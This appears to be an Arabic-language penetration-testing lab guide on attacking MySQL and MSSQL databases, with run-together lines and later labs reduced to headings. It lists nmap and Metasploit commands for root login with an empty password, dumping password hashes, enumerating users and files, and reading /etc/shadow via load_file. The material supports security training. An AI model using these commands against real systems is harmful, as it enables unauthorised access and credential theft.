6. 🗄️ لابات MySQL / MSSQL (قواعد البيانات)
6.1 💻 لاب: MySQL Recon – Basics Lab
🎯 الهدف الأساسي:
🔧 الخطوات العملية للاستغلال:
nmap -sV -p 3306 <Target_IP>
mysql -h <Target_IP> -u root -pnmap -p 3306 --script mysql-empty-password <Target_IP>
show databases;use books;select load_file('/etc/shadow');
nmap -p 3306 --script mysql-dump-hashes --script-args "mysql.username=root,mysql.password=''" <Target_IP>
nmap -p 3306 --script mysql-users --script-args "mysql.username=root,mysql.password=''" <Target_IP>nmap -p 3306 --script mysql-databases --script-args "mysql.username=root,mysql.password=''" <Target_IP>
msfconsole -q use auxiliary/scanner/mysql/mysql_writable_dirs set RHOSTS <Target_IP> set USERNAME root set PASSWORD '' run
msfconsole -q use auxiliary/scanner/mysql/mysql_file_enum set RHOSTS <Target_IP> set USERNAME root set PASSWORD '' set FILE_LIST /path/to/sensitive_files_wordlist.txt # قائمة بالملفات المحتملة run
🚀 سيناريو تحدي: الوصول إلى MySQL واستخراج هاشات المستخدمين وقراءة /etc/shadow:
/etc/shadow:🎯 الهدف الأساسي:
🔧 الخطوات العملية للاستغلال:
🚀 سيناريو تحدي: اكتشاف كلمة مرور root باستخدام Hydra، ثم الدخول بها إلى MySQL:
root باستخدام Hydra، ثم الدخول بها إلى MySQL:🎯 الهدف الأساسي:
🔧 الخطوات العملية للاستغلال:
🚀 سيناريو تحدي: الوصول إلى MSSQL، استخراج الهاشات، وقراءة الفلاج:
🎯 الهدف الأساسي:
🔧 الخطوات العملية للاستغلال:
🚀 سيناريو تحدي: تنفيذ أمر ipconfig عن بعد وتعداد حسابات النطاق:
ipconfig عن بعد وتعداد حسابات النطاق:Last updated

